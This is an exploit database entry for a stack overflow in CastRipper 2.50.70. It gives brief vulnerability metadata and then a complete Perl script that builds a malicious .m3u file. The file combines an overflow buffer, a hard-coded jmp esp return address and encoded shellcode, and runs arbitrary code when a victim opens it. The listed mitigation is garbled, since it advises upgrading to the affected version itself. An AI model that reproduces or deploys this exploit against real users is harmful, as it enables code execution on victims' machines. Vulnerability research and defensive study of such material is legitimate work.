CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit

vendor:

CastRipper

by:

Stack

9,3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: CastRipper

Affected Version From: 2.50.70

Affected Version To: 2.50.70

Patch Exists: YES

Related CWE: N/A

CPE: a:castripper:castripper:2.50.70

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit

CastRipper 2.50.70 is vulnerable to a stack overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious .m3u file with a specially crafted payload and sending it to the victim. When the victim opens the malicious file, the payload will be executed, allowing the attacker to execute arbitrary code on the victim's system.

Mitigation:

Upgrade to the latest version of CastRipper 2.50.70 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit
# Exploited By Stack
# first exploiter :d http://www.milw0rm.com/exploits/8660 bien jouer :d frero
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
my $Bof="\x41" x 26328;
my $ret="\x7D\xBC\x01\x10"; # Universall Ret Adress jmp esp 1001BC7D
 # Executable modules, item 6
 # Base=10000000
 # Size=0006F000 (454656.)
 # Entry=10023AAC CRutilit.<ModuleEntryPoint>
 # Name=CRutilit
 # Path=C:\Program Files\CastRipper\CRutility03.dll
my $nop="\x90" x 20;
open(MYFILE,'>>sploit.m3u');
print MYFILE $Bof.$ret.$nop.$shellcode;
close(MYFILE);

# milw0rm.com [2009-05-12]